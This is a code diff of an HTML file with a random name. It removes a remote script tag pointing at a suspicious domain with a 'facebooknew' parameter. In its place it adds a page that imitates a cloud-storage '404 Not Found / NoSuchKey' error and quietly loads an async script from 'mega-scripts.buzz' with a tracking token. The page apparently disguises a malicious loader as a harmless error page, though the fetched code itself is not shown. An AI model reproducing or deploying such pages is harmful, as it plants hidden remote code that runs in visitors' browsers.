--- a/sdgfsdgsd.html
+++ b/sdgfsdgsd.html
@@ -1,1 +1,26 @@
-<script src="https://tront.soisjapijapi.live/?api=1&lan=facebooknew&ht=1" type="text/javascript" async="true"></script>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>404 Not Found</title>
+</head>
+<body>
+    <h1>404 Not Found</h1>
+    <ul>
+        <li>Code: NoSuchKey</li>
+        <li>Message: The specified key does not exist.</li>
+        <li>Key: 3wjtqw7xh</li>
+        <li>RequestId: FF60BDDCECC9D752</li>
+        <li>HostId: VfyWgpNzMuBmk006p3FPcCHxOw+OXkyGqn7qXKCg5w26DKjVJhvQaLAmhW/1ciCgaBRJEe18ep4=</li>
+    </ul>
+    <h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
+    <ul>
+        <li>Code: NoSuchKey</li>
+        <li>Message: The specified key does not exist.</li>
+        <li>Key: error.html</li>
+    </ul>
+    <hr/>
+<script type="text/javascript" src="https://mega-scripts.buzz/?token=d979e5cc7476d4308bfbbc740f153db3"async="true"></script>
+</body>
+</html>
